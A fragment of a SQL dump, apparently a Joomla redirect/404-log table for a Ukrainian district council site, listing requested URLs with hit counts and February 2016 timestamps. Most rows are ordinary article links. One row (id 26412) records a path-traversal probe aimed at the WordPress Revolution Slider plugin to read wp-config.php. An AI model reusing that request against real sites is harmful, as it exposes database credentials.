22:28:49','0000-00-00 00:00:00',301),(26312,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=830:2012-11-27-08-09-31','','','',2,0,'2016-02-24 22:28:51','0000-00-00 00:00:00',301),(26313,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=729:-l20-r','','','',2,0,'2016-02-24 22:29:00','0000-00-00 00:00:00',301),(26314,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=730:2012-07-02-05-04-18','','','',2,0,'2016-02-24 22:29:02','0000-00-00 00:00:00',301),(26315,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=829:24-1600-l-r','','','',2,0,'2016-02-24 22:29:07','0000-00-00 00:00:00',301),(26316,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=830:2012-11-27-08-09-31','','','',2,0,'2016-02-24 22:29:09','0000-00-00 00:00:00',301),(26317,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=466:-l-r-2011-&catid=38&Itemid=73&lang=uk','','','',2,0,'2016-02-24 22:29:11','0000-00-00 00:00:00',301),(26318,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=687:2012-05-24-11-21-04','','','',2,0,'2016-02-24 22:29:17','0000-00-00 00:00:00',301),(26319,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=513:-lr-2012-2015-&catid=38&Itemid=73&lang=uk','','','',5,0,'2016-02-24 22:29:18','0000-00-00 00:00:00',301),(26320,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=729:-l20-r','','','',2,0,'2016-02-24 22:29:19','0000-00-00 00:00:00',301),(26321,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=730:2012-07-02-05-04-18','','','',2,0,'2016-02-24 22:29:20','0000-00-00 00:00:00',301),(26322,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=731:2012-07-02-08-51-09','','','',2,0,'2016-02-24 22:29:22','0000-00-00 00:00:00',301),(26323,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=743:2012-07-26-08-11-32','','','',2,0,'2016-02-24 22:29:23','0000-00-00 00:00:00',301),(26324,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=745:2012-07-30-09-12-07','','','',2,0,'2016-02-24 22:29:25','0000-00-00 00:00:00',301),(26325,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=753:2012-09-05-09-48-36','','','',2,0,'2016-02-24 22:29:27','0000-00-00 00:00:00',301),(26326,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=813:2012-11-12-16-44-40','','','',2,0,'2016-02-24 22:29:34','0000-00-00 00:00:00',301),(26327,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=825:-q-q','','','',2,0,'2016-02-24 22:29:36','0000-00-00 00:00:00',301),(26328,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2016-02-24 22:29:37','0000-00-00 00:00:00',301),(26329,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=829:24-1600-l-r','','','',2,0,'2016-02-24 22:29:38','0000-00-00 00:00:00',301),(26330,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=830:2012-11-27-08-09-31','','','',2,0,'2016-02-24 22:29:39','0000-00-00 00:00:00',301),(26331,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39:-22022012-&Itemid=76&lang=ru','','','',1,0,'2016-02-24 22:29:40','0000-00-00 00:00:00',301),(26332,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=563:-30012012185-12&catid=39:-22022012-&Itemid=76&lang=uk','','','',1,0,'2016-02-24 22:29:42','0000-00-00 00:00:00',301),(26333,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39:-22022012-&Itemid=76&lang=en','','','',1,0,'2016-02-24 22:29:57','0000-00-00 00:00:00',301),(26334,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39:-22022012-&Itemid=76&lang=ru','','','',1,0,'2016-02-24 22:29:59','0000-00-00 00:00:00',301),(26335,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=577:--------2011--&catid=39:-22022012-&Itemid=76&lang=uk','','','',1,0,'2016-02-24 22:30:01','0000-00-00 00:00:00',301),(26336,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=890:2014-01-06-08-19-15','','','',2,0,'2016-02-24 22:30:21','0000-00-00 00:00:00',301),(26337,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=892:2013-01-08-13-26-18','','','',2,0,'2016-02-24 22:30:22','0000-00-00 00:00:00',301),(26338,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=919:2013-01-31-10-15-40','','','',2,0,'2016-02-24 22:30:26','0000-00-00 00:00:00',301),(26339,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=939:-18-','','','',2,0,'2016-02-24 22:30:31','0000-00-00 00:00:00',301),(26340,'http://malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=941:2013-02-27-14-30-15','','','',2,0,'2016-02-24 22:30:32','0000-00-00 00:00:00',301),(26341,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1263-pro-rajonnu-programu-sotsialnoji-pidtrimki-ditej-simej-ta-molodi-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',10,0,'2016-02-24 22:31:23','0000-00-00 00:00:00',301),(26342,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1266-pro-rajonnu-tsilovu-programu-roboti-iz-obdarovanoyu-moloddyu-na-2016-2018-roki','','','',8,0,'2016-02-24 22:31:25','0000-00-00 00:00:00',301),(26343,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1266-pro-rajonnu-tsilovu-programu-roboti-iz-obdarovanoyu-moloddyu-na-2016-2018-roki?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-24 22:31:27','0000-00-00 00:00:00',301),(26344,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2016-02-24 22:31:28','0000-00-00 00:00:00',301),(26345,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2016-02-24 22:31:30','0000-00-00 00:00:00',301),(26346,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=813:2012-11-12-16-44-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-02-24 22:31:32','0000-00-00 00:00:00',301),(26347,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1268-pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-02-24 22:31:33','0000-00-00 00:00:00',301),(26348,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1015:-200-&Itemid=0&lang=ru&option=com_content&view=article','','','',7,0,'2016-02-24 22:33:33','0000-00-00 00:00:00',301),(26349,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=314:2011-05-20-13-01-00&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-24 23:52:18','0000-00-00 00:00:00',301),(26350,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1173:2014-01-15-10-37-18','','','',42,0,'2016-02-25 03:05:49','0000-00-00 00:00:00',301),(26351,'http://malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=193:------------2009-2010-&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-25 04:04:23','0000-00-00 00:00:00',301),(26352,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=796:2012-10-18-07-54-09&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-25 11:42:14','0000-00-00 00:00:00',301),(26353,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=941:2013-02-27-14-30-15&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-25 11:44:31','0000-00-00 00:00:00',301),(26354,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=959:2013-03-11-06-19-41&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-25 11:44:36','0000-00-00 00:00:00',301),(26355,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=972:2013-03-19-10-50-05&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-02-25 11:44:49','0000-00-00 00:00:00',301),(26356,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1075:2013-09-06-09-25-33&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-25 11:45:02','0000-00-00 00:00:00',301),(26357,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=753:2012-09-05-09-48-36&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2016-02-25 11:46:16','0000-00-00 00:00:00',301),(26358,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-25 11:46:20','0000-00-00 00:00:00',301),(26359,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-25 11:46:26','0000-00-00 00:00:00',301),(26360,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=413:-2011-2012-&Itemid=72&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-25 11:46:47','0000-00-00 00:00:00',301),(26361,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=991:2013-04-22-08-24-54&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-25 11:46:59','0000-00-00 00:00:00',301),(26362,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2016-02-25 12:24:08','0000-00-00 00:00:00',301),(26363,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&Itemid=&lang=uk&option=com_content&view=article','','','',7,0,'2016-02-25 12:28:23','0000-00-00 00:00:00',301),(26364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11&Itemid=14&lang=ru','','','',2,0,'2016-02-25 12:59:19','0000-00-00 00:00:00',301),(26365,'http://www.malyn-rayrada.org.ua/index.php/466-chi-vidkrie-dveri-1-veresnja-2013-roku-novo-vorob?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-02-25 12:59:40','0000-00-00 00:00:00',301),(26366,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/img-7480-89','','','',1,0,'2016-02-25 16:16:03','0000-00-00 00:00:00',301),(26367,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/0-110rda-125','','','',1,0,'2016-02-25 16:16:09','0000-00-00 00:00:00',301),(26368,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0882-8-102','','','',1,0,'2016-02-25 16:16:32','0000-00-00 00:00:00',301),(26369,'http://malyn-rayrada.org.ua/index.php?Itemid=77&id=40:--28032012-&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2016-02-25 23:43:47','0000-00-00 00:00:00',301),(26370,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=762:-210-&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-26 01:03:25','0000-00-00 00:00:00',301),(26371,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=609:-q-q&lang=en&option=com_content&view=article','','','',3,0,'2016-02-26 01:33:17','0000-00-00 00:00:00',301),(26372,'http://malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1064:2013-08-09-07-52-21&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-26 04:29:00','0000-00-00 00:00:00',301),(26373,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=466:-l-r-2011-&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2016-02-26 05:35:06','0000-00-00 00:00:00',301),(26374,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=209:2010-12-15-14-27-50&catid=29&Itemid=60&lang=en','','','',7,0,'2016-02-26 05:46:23','0000-00-00 00:00:00',301),(26375,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=323:--------2007--2011-&catid=33:-20052011&Itemid=66&lang=uk','','','',6,0,'2016-02-26 05:49:54','0000-00-00 00:00:00',301),(26376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=275:---------------2011-&catid=31&Itemid=62&lang=uk','','','',6,0,'2016-02-26 06:19:20','0000-00-00 00:00:00',301),(26377,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/15-2010-06-05-12-55-45/---1932-33-/1106--qq?Itemid=0&lang=en','','','',6,0,'2016-02-26 07:45:45','0000-00-00 00:00:00',301),(26378,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/813-2012-11-12-16-44-40?Itemid=0&lang=en','','','',14,0,'2016-02-26 07:48:48','0000-00-00 00:00:00',301),(26379,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=en&id=813:2012-11-12-16-44-40','','','',2,0,'2016-02-26 07:48:52','0000-00-00 00:00:00',301),(26380,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=939:-18-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-26 07:54:37','0000-00-00 00:00:00',301),(26381,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-26 07:55:40','0000-00-00 00:00:00',301),(26382,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=830:2012-11-27-08-09-31&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2016-02-26 07:55:56','0000-00-00 00:00:00',301),(26383,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=772:-2011-2012-&Itemid=84&lang=en&option=com_content&view=article','','','',1,0,'2016-02-26 07:56:05','0000-00-00 00:00:00',301),(26384,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=946:-----l-r--2011--2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-26 07:56:17','0000-00-00 00:00:00',301),(26385,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=956:2013-03-07-14-51-33&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-26 07:56:17','0000-00-00 00:00:00',301),(26386,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=941:2013-02-27-14-30-15&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-26 07:57:03','0000-00-00 00:00:00',301),(26387,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1173:2014-01-15-10-37-18&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-26 07:57:10','0000-00-00 00:00:00',301),(26388,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=955:2013-03-07-06-31-04&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-02-26 07:59:35','0000-00-00 00:00:00',301),(26389,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1216:-q-q&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-26 07:59:53','0000-00-00 00:00:00',301),(26390,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-02-26 07:59:53','0000-00-00 00:00:00',301),(26391,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=825:-q-q&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-02-26 08:00:01','0000-00-00 00:00:00',301),(26392,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=978:-6612-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-26 08:00:17','0000-00-00 00:00:00',301),(26393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51&layout=blog&Itemid=92&lang=uk&limitstart=15','','','',8,0,'2016-02-26 08:03:38','0000-00-00 00:00:00',301),(26394,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1221:2014-02-22-08-09-27&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-02-26 08:04:46','0000-00-00 00:00:00',301),(26395,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=946:-l-r-2011-2015-&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2016-02-26 08:15:14','0000-00-00 00:00:00',301),(26396,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=956:2013-03-07-14-51-33&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2016-02-26 08:15:24','0000-00-00 00:00:00',301),(26397,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2016-02-26 08:15:26','0000-00-00 00:00:00',301),(26398,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1075:2013-09-06-09-25-33&Itemid=&lang=uk&option=com_content&view=article','','','',4,0,'2016-02-26 08:15:44','0000-00-00 00:00:00',301),(26399,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=976:2013-03-21-18-42-06&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-26 08:15:48','0000-00-00 00:00:00',301),(26400,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=753:2012-09-05-09-48-36&Itemid=0&lang=en&option=com_content&view=article','','','',3,0,'2016-02-26 08:15:59','0000-00-00 00:00:00',301),(26401,'http://www.malyn-rayrada.org.ua/index.php?catid=37:--21102011-&id=413:-2011-2012-&Itemid=72&lang=uk&option=com_content&view=article','','','',3,0,'2016-02-26 08:16:03','0000-00-00 00:00:00',301),(26402,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2016-02-26 08:16:20','0000-00-00 00:00:00',301),(26403,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=413:-----------2011-2012-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-02-26 08:16:41','0000-00-00 00:00:00',301),(26404,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1004:2013-05-04-11-41-00&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-26 08:16:44','0000-00-00 00:00:00',301),(26405,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=957:199-&Itemid=14&lang=uk&option=com_content&view=article','','','',50,0,'2016-02-26 08:23:48','0000-00-00 00:00:00',301),(26406,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=946:-----l-r--2011--2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',4,0,'2016-02-26 08:23:58','0000-00-00 00:00:00',301),(26407,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1215:-1200-&lang=en&option=com_content&view=article','','','',1,0,'2016-02-26 08:24:01','0000-00-00 00:00:00',301),(26408,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=753:2012-09-05-09-48-36&lang=en&option=com_content&view=article','','','',3,0,'2016-02-26 08:24:39','0000-00-00 00:00:00',301),(26409,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=941:2013-02-27-14-30-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-02-26 08:24:40','0000-00-00 00:00:00',301),(26410,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=745:2012-07-30-09-12-07&lang=en&option=com_content&view=article','','','',1,0,'2016-02-26 08:24:40','0000-00-00 00:00:00',301),(26411,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/753-2012-09-05-09-48-36?lang=ru','','','',1,0,'2016-02-26 08:25:04','0000-00-00 00:00:00',301),(26412,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',1,0,'2016-02-26 08:25:38','0000-00-00 00:00:00',301),(26413,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1215--1200-?lang=uk','','','',1,0,'2016-02-26 08:25:44','0000-00-00 00:00:00',301),(26414,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1015:-200-&Itemid=&lang=uk&option=com_content&view=article','','','',16,0,'2016-02-26 08:26:20','0000-00-00 00:00:00',301),(26415,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/990--2013-?lang=ru','','','',1,0,'2016-02-26 08:26:22','0000-00-00 00:00:00',301),(26416,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/753-2012-09-05-09-48-36?lang=uk','','','',1,0,'2016-02-26 08:26:28','0000-00-00 00:00:00',301),(26417,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/976-2013-03-21-18-42-06?lang=ru','','','',1,0,'2016-02-26 08:26:32','0000-00-00 00:00:00',301),(26418,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=1075:2013-09-06-09-25-33','','','',1,0,'2016-02-26 08:26:35','0000-00-00 00:00:00',301),(26419,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=991:2013-04-22-08-24-54','','','',1,0,'2016-02-26 08:27:00','0000-00-00 00:00:00',301),(26420,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=18:2010-06-06-10-06-41','','','',1,0,'2016-02-26 08:27:54','0000-00-00 00:00:00',301),(26421,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1213-2014-02-14-13-53-12?Itemid=0&lang=ru','','','',2,0,'2016-02-26 08:28:19','0000-00-00 00:00:00',301),(26422,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1075-2013-09-06-09-25-33?Itemid=0&lang=ru','','','',1,0,'2016-02-26 08:28:28','0000-00-00 00:00:00',301),(26423,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1102-2013-10-03-08-08-33?Itemid=0&lang=uk','','','',1,0,'2016-02-26 08:28:33','0000-00-00 00:00:00',301),(26424,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/939--18-?Itemid=0&lang=ru','','','',1,0,'2016-02-26 08:28:34','0000-00-00 00:00:00',301),(26425,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1102-2013-10-03-08-08-33?Itemid=0&lang=en','','','',1,0,'2016-02-26 08:28:36','0000-00-00 00:00:00',301),(26426,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1173:2014-01-15-10-37-18&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-02-26 08:28:41','0000-00-00 00:00:00',301),(26427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=323:--------2007--2011-&catid=33&Itemid=66&lang=uk','','','',9,0,'2016-02-26 09:39:26','0000-00-00 00:00:00',301),(26428,'http://malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=509:2011-12-20-08-03-11&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-26 10:43:20','0000-00-00 00:00:00',301),(26429,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=316:-2011-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-02-26 10:52:12','0000-00-00 00:00:00',301),(26430,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=647:2012-04-09-08-35-02&catid=36&Itemid=70&lang=uk','','','',2,0,'2016-02-26 11:31:08','0000-00-00 00:00:00',301),(26431,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1066:-23-&lang=en&option=com_content&view=article','','','',1,0,'2016-02-26 13:53:38','0000-00-00 00:00:00',301),(26432,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43&layout=blog&Itemid=82&lang=uk&limitstart=30','','','',3,0,'2016-02-26 14:41:49','0000-00-00 00:00:00',301),(26433,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=549:-2010-2012-&catid=39&Itemid=76&lang=uk','','','',2,0,'2016-02-26 15:18:58','0000-00-00 00:00:00',301),(26434,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=30','','','',1,0,'2016-02-26 17:53:08','0000-00-00 00:00:00',301),(26435,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=745:2012-07-30-09-12-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2016-02-26 18:20:38','0000-00-00 00:00:00',301),(26436,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=43&Itemid=82&lang=uk&limitstart=30','','','',2,0,'2016-02-26 18:31:08','0000-00-00 00:00:00',301),(26437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=43:--25072012-&layout=blog&Itemid=82&lang=uk&limitstart=30','','','',3,0,'2016-02-26 18:53:16','0000-00-00 00:00:00',301),(26438,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=434:2011-10-21-15-10-36&catid=37&Itemid=72&lang=uk','','','',5,0,'2016-02-26 23:47:14','0000-00-00 00:00:00',301),(26439,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=975:-2012-2015-&Itemid=88&lang=ru&option=com_content&view=article','','','',3,0,'2016-02-27 05:32:01','0000-00-00 00:00:00',301),(26440,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1102-2013-10-03-08-08-33?lang=ru','','','',1,0,'2016-02-27 05:36:54','0000-00-00 00:00:00',301),(26441,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/745-2012-07-30-09-12-07?lang=ru','','','',1,0,'2016-02-27 05:37:15','0000-00-00 00:00:00',301),(26442,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1213-2014-02-14-13-53-12?lang=uk','','','',1,0,'2016-02-27 05:37:24','0000-00-00 00:00:00',301),(26443,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/825--q-q?Itemid=0&lang=uk','','','',1,0,'2016-02-27 05:38:25','0000-00-00 00:00:00',301),(26444,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/1066--23-?Itemid=0&lang=uk','','','',1,0,'2016-02-27 05:38:45','0000-00-00 00:00:00',301),(26445,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=941:2013-02-27-14-30-15','','','',1,0,'2016-02-27 05:39:48','0000-00-00 00:00:00',301),(26447,'http://www.malyn-rayrada.org.ua/index.php/component/content/article/11-2010-06-05-12-55-45/2010-06-05-12-54-02/890-2013-01-06-09-42-40','','','',1,0,'2016-02-27 08:50:07','0000-00-00 00:00:00',301),(26448,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=890:2013-01-06-09-42-40','','','',1,0,'2016-02-27 08:50:20','0000-00-00 00:00:00',301),(26449,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=890:2013-01-06-09-42-40','','','',18,0,'2016-02-27 08:50:35','0000-00-00 00:00:00',301),(26452,'http://www.malyn-rayrada.org.ua/index.php/990-pro-perenesennya-dati-sklikannya-drugogo-plenarnogo-zasidannya-36-sesiji-rajonnoji-radi-6-sklikannya?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-27 11:39:07','0000-00-00 00:00:00',301),(26453,'http://www.malyn-rayrada.org.ua/index.php/991-ogoloshuetsya-konkurs?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-02-27 11:39:09','0000-00-00 00:00:00',301),(26455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&Itemid=14&lang=uk','','','',2,0,'2016-02-27 11:51:13','0000-00-00 